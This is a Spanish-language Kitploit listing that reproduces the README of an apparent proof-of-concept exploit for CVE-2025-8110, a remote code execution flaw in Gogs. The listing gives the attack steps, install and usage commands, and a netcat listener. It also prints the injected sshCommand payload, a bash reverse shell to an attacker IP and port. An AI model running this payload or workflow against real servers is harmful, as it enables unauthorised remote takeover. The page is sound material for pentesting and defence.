Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-8110 — Exploit de prueba de concepto para CVE-2025-8110, una vulnerabilidad RCE en Gogs que explota el path traversal mediante enlaces simbólicos e inyección de sshCommand para entregar una reverse shell. | Kitploit
Herramientas/GitHubGitHub/ghxstsec/cve-2025-8110
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

Exploit de prueba de concepto para CVE-2025-8110, una vulnerabilidad RCE en Gogs que explota el path traversal mediante enlaces simbólicos e inyección de sshCommand para entregar una reverse shell.

Ver Repositorio
53hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Gogs RCE Exploit (CVE-2025-8110)

Python License Expertise

Una prueba de concepto (PoC) para CVE-2025-8110, una vulnerabilidad crítica en Gogs que permite ejecución remota de código (RCE) mediante la manipulación de .git/config usando bypass de enlaces simbólicos e inyección de sshCommand.

📖 Descripción general

Esta explotación apunta a una falla de Path Traversal en la gestión de contenido de la API de Gogs. Un usuario autenticado puede:

  1. Crear un repositorio y enviar un enlace simbólico que apunte al .git/config interno.
  2. Usar la API para sobrescribir el archivo de configuración objetivo a través del enlace simbólico.
  3. Inyectar un sshCommand malicioso para ejecutar una Reverse Shell cuando el servidor realice operaciones Git.

🚀 Características

  • Flujo de trabajo automatizado: Maneja el inicio de sesión, la creación de repositorios, el despliegue del enlace simbólico y el envenenamiento.
  • Codificación robusta: Codifica automáticamente las credenciales en URL para manejar caracteres especiales (p. ej., !, @).
  • Salida enriquecida: Registro de alta visibilidad usando la librería Rich.

🛠 Requisitos previos

  • Python 3.12+
  • Git instalado en el sistema local.
  • Credenciales válidas en la instancia de Gogs objetivo.

📦 Instalación

  1. Clona el repositorio:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

Instala las dependencias:

root@kitploit:~
pip3 install -r requirements.txt

💻 Uso

Inicia tu listener:

root@kitploit:~
nc -lvnp 6666

Ejecuta el exploit:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

Argumentos:

Núcleo de la vulnerabilidad:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Cuando Gogs ejecuta un comando Git que requiere transporte de red (como una sincronización de espejo o una comprobación interna de referencias), invoca el sshCommand, activando la reverse shell.

⚠️ Aviso legal: Esta herramienta es solo para fines educativos y pruebas de seguridad autorizadas. El autor no es responsable de ningún mal uso o daño causado por este script. El acceso no autorizado a sistemas informáticos es ilegal.

Descargar herramienta
ArgumentoDescripción
-u, --urlURL base de la instancia de Gogs objetivo (p. ej., http://target.htb:3000).
-lh, --hostIP del atacante (LHOST) a la que se conectará la reverse shell.
-lp, --portPuerto del listener (LPORT) configurado en tu máquina.
-p, --passwordContraseña de la cuenta pwnuser para realizar la autenticación.
-x, --proxy(Opcional) Enruta el tráfico a través de un proxy local (por defecto: http://localhost:8080).